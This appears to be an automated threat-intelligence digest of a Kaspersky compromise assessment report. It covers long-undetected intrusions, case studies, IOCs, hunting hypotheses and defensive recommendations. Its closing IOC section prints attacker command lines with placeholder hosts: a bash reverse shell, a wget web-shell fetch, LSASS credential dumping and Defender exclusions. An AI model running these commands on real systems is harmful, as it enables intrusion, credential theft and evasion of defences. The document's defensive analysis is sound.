Missed incidents, persistent threats, and response gaps: Insights from compromise assessment projects
Kaspersky's 2025 compromise assessment report reveals that organizations consistently fail to detect long-dwelling threats, with 30.8% of incidents persisting over 3 months and 52% of high-severity compromises going undetected for 90+ days. Key findings include widespread abuse of LoLBins and remote management tools in every incident-bearing engagement, 40% of web shells surviving in backups to be restored post-remediation, and a strong correlation between in-house forensics/reverse-engineering capability and reduced incident severity. Multiple case studies document dormant crypto-mining on domain controllers (4 years), in-memory LionTail implants on critical servers, PurpleFox rootkit infections evading EDR with disabled memory scanning, and ClipBanker persistence via registry Run keys with Defender exclusions.
- filenamedl1host.exeNSABuffMiner crypto-mining component found hidden in C:\Windows\Fonts\Mysql directory on domain controllers, undetected for 4 years.
- filenameEter.exeNSABuffMiner lateral movement tool that injects Eternalblue2.dll and Doublepulsar2.dll into lsass.exe and explorer.exe for SMB-based propagation.
- filenamescrcons.exeLegitimate WMI host binary at C:\Windows\System32\wbem\scrcons.exe abused to host injected LionTail shellcode payloads in memory; detected via static memory signatures.
- filenameup.exeCobalt Strike payload downloaded from C2 server to C:\windows\system32\up.exe, persisted via a service masquerading as 'ChromeUpdate'.
- filenamewinamp.exeClipBanker malware masquerading as Winamp media player, stored in C:\Users\Administrator\Saved Games\ and persisted via registry Run key.
- md5852d3f99dc4720530e07a0a39d519f37MD5 hash of associated temporary file found in C:\Windows\Temp\ alongside Mimikatz binary.
- md5e03977c9df1f06948b884e1666306c74MD5 hash of associated log file found in C:\Windows\Temp\ alongside Mimikatz binary.
- md5f93811f1453f43888c4f6fe21cbd10c3MD5 hash of Mimikatz binary found at C:\Windows\Temp\mimikatz.exe on compromised servers during post-incident compromise assessment.
- registry_keyHKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIpClipBanker persistence registry Run key with randomized value name '9Er6IIp', pointing to malware executable in Administrator's Saved Games folder.
- urlhxxps://github[.]com/kurtcobain555/fileshell/raw/main/geckoshell[.]txtPublic GitHub repository URL used by a cron job to fetch and deploy a PHP web shell onto a Linux web server, providing persistent remote code execution.
Detection / Hunteropenrouter
What Happened
Kaspersky reviewed security assessments they conducted for clients in 2025 and found that many organizations had serious security breaches that went undetected for months or even years. In one case, malicious cryptocurrency mining software had been running on a company's central servers for four years without anyone noticing. The report shows that simply buying security software is not enough — organizations need trained staff who actively monitor alerts, hunt for hidden threats, and regularly check whether their security tools are working correctly. A major problem is that attackers hide malicious programs in backup files, which means that even after a company cleans up an infection, restoring from backup can bring the malware back. The report recommends that organizations conduct regular proactive security checks rather than only investigating after a known breach, ensure their security tools are properly configured and updated, and invest in training internal staff to analyze digital evidence and malicious software.
Key Takeaways
- 30.8% of discovered incidents had activity spanning over 3 months; 52% of high-severity compromises were only found after 90 days undetected, with the oldest incident being 4 years old.
- 40% of discovered web shells resided in backups and were restored post-incident-response, reintroducing threats after remediation.
- LoLBins and remote management tools were present in 100% of compromise assessment engagements that detected incidents, making behavioral baselining essential.
- Post-incident checkups yielded the highest proportion of high-severity findings (40.7%), indicating that scoped IR frequently misses additional persistence mechanisms.
- Organizations with in-house digital forensics and malware reverse engineering capabilities experienced significantly fewer high-severity incidents.
- 60% of incidents were missed by enterprises due to absence of high-confidence alerts from existing tools; 20% were found only through manual investigation.
Affected Systems
- Windows domain controllers
- Windows servers (general)
- Windows workstations
- Linux web servers (cloud-hosted, non-AD-joined)
- macOS workstations using generative AI development tools
Vulnerabilities (CVEs)
| CVE | Product | Severity | Description |
|---|---|---|---|
| CVE-2017-0144 | Microsoft Windows SMBv1 (EternalBlue / MS17-010) | Critical | Remote code execution vulnerability in SMBv1 exploited by NSABuffMiner for lateral movement via DLL injection into lsass.exe and explorer.exe. |
Attack Chain
- Initial Access: Web application vulnerabilities exploited for RCE; EternalBlue (MS17-010) used for SMB-based lateral movement by NSABuffMiner
- Persistence: Multiple techniques per host including cron jobs downloading web shells, registry Run keys (ClipBanker), WMI event consumers with deceptive aliases, scheduled tasks, and malicious Windows services with Microsoft-prefixed names
- Defense Evasion: Windows Defender exclusion paths added, hidden/system file attributes applied, files hidden in C:\Windows\Fonts\Mysql directory, in-memory injection into legitimate processes (svchost.exe, scrcons.exe), LoLBin abuse (certutil, bitsadmin, regsvr32, wmic)
- Credential Access: Mimikatz deployed on domain controllers and critical servers; LSASS memory dumped via rundll32 and comsvcs.dll; local administrator passwords reset to common values across servers via PsExec
- Lateral Movement: Impacket used for remote execution; PsExec for mass script deployment; SMB exploitation via EternalBlue/DoublePulsar DLL injection into lsass.exe and explorer.exe
- Command and Control: Bash reverse shells from Linux web servers; Cobalt Strike beacons; LionTail implants using HTTP.sys for covert inbound HTTP C2; PurpleFox rootkit maintaining stealthy kernel-mode persistence
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article describes detection logic families and threat hunting rule sets used internally by Kaspersky's compromise assessment service (including static memory signatures for LionTail detection), but does not publish any reusable detection rules, queries, or signatures.
Detection Engineering Assessment
| Dimension | Rating | Rationale |
|---|---|---|
| EDR Visibility | Medium | EDR solutions were present in most environments but frequently misconfigured, outdated, or lacking memory inspection modules. The PurpleFox case study explicitly shows EDR with disabled memory scanning failed to detect injected DLLs. Many organizations lacked EPP health checks, and 9.4% of cases had products that were misconfigured or malfunctioning. |
| Network Visibility | Low | Network traffic analysis was part of the compromise assessment methodology, but many organizations lacked continuous network monitoring. LionTail C2 blended into legitimate HTTP traffic via HTTP.sys, and bash reverse shells initiated outbound from inside the network bypassing firewalls. The article emphasizes that logs were often rotated or purged before assessment. |
| Detection Difficulty | Hard | The threats described use legitimate binaries (LoLBins), in-memory injection, fileless techniques, and masquerading with deceptive names. Distinguishing malicious use of remote management tools from legitimate administration requires organization-specific baselining. Memory-resident threats like LionTail and PurpleFox require specialized memory scanning capabilities that were frequently disabled. Web shells in backups require asset inventory and backup scanning beyond typical EDR scope. |
Required Log Sources
- Windows Security Event Logs (especially 4624, 4625, 4688, 4698, 7045)
- Windows Sysmon logs (process creation, network connections, file creation, registry modifications)
- PowerShell Script Block Logging (Event ID 4104)
- WMI Activity logs (Microsoft-Windows-WMI-Activity/Operational)
- Linux syslog and auth logs
- Cron job logs (/var/log/cron or journalctl)
- EDR memory scanning telemetry
- Network flow data / proxy logs
- Scheduled Task logs (Microsoft-Windows-TaskScheduler/Operational)
- Windows Service Control Manager logs (System Event Log)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for processes executing from unusual directories such as C:\Windows\Fonts\Mysql or C:\Users\Administrator\Saved Games, as attackers abuse non-standard paths to hide malicious binaries from casual observation. | Sysmon Event ID 1 (Process Creation) with Image path filtering; EDR process execution telemetry | Execution / Defense Evasion | Low — legitimate software rarely executes from these specific paths; verify against known software inventory. |
| Consider hunting for WMI event consumers with suspicious or deceptive names, particularly those executing PowerShell with aliases that masquerade as security vendor software (e.g., aliasing Invoke-Expression as 'kaspersky'). | WMI Activity operational logs; Sysmon Event ID 19/20/21 (WMI Event Filter/Consumer/Filter-to-Consumer Binding); EDR WMI telemetry | Persistence | Low — legitimate WMI consumers rarely use deceptive aliases or download remote PowerShell scripts. |
| Consider hunting for Windows services created with names mimicking legitimate Microsoft or third-party software (e.g., 'ChromeUpdate', 'MicrosoftMysql', 'MicrosoftFonts', 'MicrosoftMSSql') that point to non-standard binary paths. | Windows System Event Log (Event ID 7045 - Service Installed); Sysmon Event ID 6 (Driver Load) and Event ID 1; EDR service creation telemetry | Persistence | Medium — legitimate software updates may create similarly named services; correlate with change management records. |
| Consider hunting for Windows Defender exclusion paths being added via PowerShell, especially paths pointing to user profile directories or non-standard locations, as this is a common defense evasion step before deploying malware. | PowerShell Script Block Logging (Event ID 4104); Windows Defender operational logs; EDR PowerShell telemetry | Defense Evasion | Low to Medium — legitimate administrators may add exclusions for development folders; correlate with change tickets and administrator activity baselines. |
| Consider hunting for in-memory injection into legitimate Windows processes such as scrcons.exe and svchost.exe, particularly on critical servers, by leveraging memory scanning or behavioral detection of unexpected network connections from these processes. | EDR memory scanning module; Sysmon Event ID 7 (Image Loaded - unexpected DLLs in system processes); Sysmon Event ID 3 (Network Connection from system processes); memory analysis tools (Volatility, Rekall) | Defense Evasion / Command and Control | Medium — svchost.exe and scrcons.exe legitimately host various services; focus on anomalous network connections, unexpected loaded modules, or memory regions with executable permissions. |
Control Gaps
- EDR memory inspection modules were disabled, allowing in-memory threats (PurpleFox, LionTail) to evade detection entirely
- Backup systems were not scanned for malicious files, enabling web shell reintroduction after remediation (40% of web shells found in backups)
- Asset inventory gaps left cloud-only Linux web servers untracked, allowing persistent web shells to go undetected
- GPO-based software distribution with 'Everyone - Full Control' share ACLs allowed any authenticated user to replace legitimate binaries with malware
- Windows audit policies were disabled or event log collection was missing in approximately 50% of MSSP-supported projects
- EPP agents were installed but not enforced — not tuned, updated, or validated, leading to missed detections
- No threat intelligence feeds were integrated, causing analysts to rely on generic alerts and miss known malicious behaviors
- Low-confidence alerts were never reexamined after initial dismissal, allowing dormant threats to persist
Key Behavioral Indicators
- Process execution from C:\Windows\Fonts\Mysql directory (non-font files hidden from regular users)
- Windows Defender exclusion paths pointing to user profile directories (e.g., Saved Games)
- WMI event consumers with deceptive alias names (e.g., 'kaspersky' aliased to Invoke-Expression)
- Windows services with Microsoft-prefixed names (MicrosoftMysql, MicrosoftFonts, MicrosoftMSSql) pointing to non-standard binaries
- Service named 'ChromeUpdate' with binary path at C:\windows\system32\up.exe
- Scheduled tasks with names At1, At2 on domain controllers
- Cron jobs on Linux servers fetching files from external GitHub repositories and placing them in web-accessible directories
- Bash reverse shell processes running under 'apache' user context
- rundll32.exe loading comsvcs.dll with LSASS process PID arguments (credential dumping)
- scrcons.exe process with unexpected network connections or injected memory regions (LionTail indicator)
- PsExec execution targeting multiple servers from a single host with password reset commands
- PowerShell downloading executables from external IPs and saving to system32 directory
False Positive Assessment
- Medium — Many indicators involve legitimate binaries (LoLBins, remote management tools, scrcons.exe, svchost.exe) that are used routinely in administrative contexts. The article explicitly notes that 'a remote management tool was executed' is insufficient to classify an incident, and that organization-specific baselining is required. However, specific indicators like files in C:\Windows\Fonts\Mysql, Defender exclusion paths in user directories, and WMI consumers with deceptive aliases have lower false positive rates.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Consider conducting a compromise assessment or threat hunt focused on persistence mechanisms described in this report, particularly registry Run keys with randomized names, WMI event consumers, scheduled tasks with generic names (At1, At2), and services with Microsoft-prefixed names.
- If your EDR supports memory scanning, consider verifying that the memory inspection module is enabled on all critical servers, especially domain controllers and web servers, to detect in-memory threats like PurpleFox and LionTail.
- Consider scanning backup repositories for known web shell signatures and malicious file patterns before any restoration operations, as 40% of discovered web shells were preserved in backups.
- If applicable to your environment, consider auditing all GPO-based software distribution shares for overly permissive ACLs (e.g., 'Everyone - Full Control') and restricting to authenticated users with read-only access.
- Consider verifying that Windows Defender exclusions are reviewed and that no unexpected paths (especially user profile directories) have been added to exclusion lists.
Infrastructure Hardening
- Consider implementing a formal asset inventory process that includes cloud-only Linux web servers not joined to Active Directory, as 25% of engagements revealed untracked devices.
- Evaluate whether your vulnerability management program includes systematic GPO and share permission audits, as writable GPO distribution shares can enable domain-wide compromise from a single low-privilege account.
- Consider implementing continuous EPP/EDR health checks, including sensor health validation, signature currency verification, and rule relevance testing, as nearly 50% of incidents escalated to high severity where EPP health checks were weak.
- If using an MSSP, consider establishing clear SLAs, performance metrics, and regular validation of log collection completeness, as 50% of MSSP-supported projects had basic Windows audit gaps.
- Consider enriching executed binary hashes with functional categories (e.g., 'Remote Access', 'Golden Image') and alerting when categorized binaries execute from non-standard paths.
User Protection
- Consider deploying detection rules for known LoLBin abuse patterns (certutil -decode, bitsadmin -transfer, regsvr32 -i, wmic process call create) and baselining them against your organization's normal activity.
- If your EDR supports host isolation, consider pre-configuring isolation playbooks for critical servers where in-memory threats may be detected, as fileless malware requires rapid containment.
- Consider implementing a policy governing the use of generative AI development tools (e.g., Claude Code, Copilot) with confidential information, as these tools may automatically capture filesystem snapshots containing sensitive data.
- Evaluate whether your organization's remote management tool policy includes forwarding operational logs to a central SIEM for continuous monitoring and deviation detection.
Security Awareness
- Consider updating security awareness curricula to address credential leakage from personal devices and reinforce secure BYOD practices, as credential leaks from personal devices accounted for 27.2% of incidents where inadequate awareness was identified.
- Consider conducting periodic tabletop exercises that test not only technical playbooks but also communication workflows between IT, security, and system owners, as 32% of projects revealed communication issues impacting response execution.
- If your organization conducts penetration tests, consider requiring artifact cleanup documentation and scheduling assessments to avoid overlap with active penetration testing, as 12% of cases involved confusion between attacker artifacts and pentest leftovers.
- Consider developing awareness sessions for employees on the risk of exposing confidential internal data to generative AI tools, including automatic filesystem snapshot capture by IDE extensions.
MITRE ATT&CK Mapping
- T1053.003 - Scheduled Task/Job: Cron
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1546.003 - Event Triggered Execution: WMI Event Subscription
- T1543.003 - Create or Modify System Process: Windows Service
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1027.001 - Obfuscated Files or Information: Binary Padding
- T1055 - Process Injection
- T1003.001 - OS Credential Dumping: LSASS Memory
- T1210 - Exploitation of Remote Services
- T1218 - System Binary Proxy Execution
- T1071.001 - Application Layer Protocol: Web Protocols
- T1570 - Lateral Tool Transfer
- T1105 - Ingress Tool Transfer
- T1505.003 - Server Software Component: Web Shell
Additional IOCs
- File Hashes:
E03977C9DF1F06948B884E1666306C74(MD5) - MD5 hash of associated log file found in C:\Windows\Temp\ alongside Mimikatz binary.852D3F99DC4720530E07A0A39D519F37(MD5) - MD5 hash of associated temporary file found in C:\Windows\Temp\ alongside Mimikatz binary.
- Registry Keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall- Recommended registry key to audit for unauthorized remote management tool installations across all hosts.HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall- Recommended 32-bit registry location to audit for unauthorized software installations.
- File Paths:
C:\Windows\Fonts\Mysql- Abused directory on domain controllers where NSABuffMiner stored malicious files for 4 years; only font files are visible to regular users in the Fonts directory, hiding non-font payloads.C:\Users\Administrator\Saved Games- Directory used by ClipBanker to store malware (winamp.exe, Update Task Machine CoreA.exe) and added to Windows Defender exclusion list.C:\Windows\Temp\mimikatz.exe- Mimikatz binary location on compromised servers discovered during compromise assessment.C:\Windows\System32\wbem\scrcons.exe- Legitimate WMI host binary abused by LionTail framework to host in-memory injected payloads.
- Command Lines:
- Purpose: Download PHP web shell from GitHub repository to web server via cron job | Tools:
wget,cron| Stage: Persistence |wget -q <url> -O <dest_path>.php - Purpose: Establish bash reverse shell from compromised web server | Tools:
bash| Stage: Command and Control |/bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 - Purpose: Add Windows Defender exclusion path for malware directory | Tools:
powershell.exe| Stage: Defense Evasion |powershell.exe -Command Add-MpPreference -ExclusionPath '<path>' -Force - Purpose: Set hidden and system file attributes on malware binaries to evade visual detection | Tools:
attrib| Stage: Defense Evasion |attrib +h +s "<file_path>" - Purpose: WMI event consumer executing PowerShell payload with deceptive alias masquerading as Kaspersky software | Tools:
powershell,WMI| Stage: Persistence - Purpose: Execute script across multiple servers via PsExec to change local administrator passwords to a common value | Tools:
psexec,net| Stage: Lateral Movement |psexec -u <user> -p <pass> <server_list>.txt <script>.cmd - Purpose: Download Cobalt Strike payload from C2 server via PowerShell | Tools:
powershell,cmd.exe| Stage: Execution |powershell "irm <url> -outfile up.exe" - Purpose: Create malicious Windows service masquerading as Chrome update | Tools:
sc.exe,cmd.exe| Stage: Persistence |sc create "ChromeUpdate" binpath="cmd /k <binary_path>" - Purpose: Dump LSASS memory using comsvcs.dll via rundll32 | Tools:
rundll32.exe| Stage: Credential Access |rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 <PID> <output_path>
- Purpose: Download PHP web shell from GitHub repository to web server via cron job | Tools:
- Other:
MicrosoftMysql- Malicious Windows service name created by NSABuffMiner for crypto-miner persistence on domain controllers, masquerading with Microsoft prefix.MicrosoftFonts- Malicious Windows service name created by NSABuffMiner for crypto-miner persistence, masquerading with Microsoft prefix.MicrosoftMSSql- Malicious Windows service name created by NSABuffMiner for crypto-miner persistence, masquerading with Microsoft prefix.ChromeUpdate- Malicious Windows service name used to persist Cobalt Strike payload (up.exe), masquerading as a legitimate Google Chrome update service.Aconsumerts- WMI CommandLineEventConsumer name used for malicious persistence, executing PowerShell payload via deceptive alias.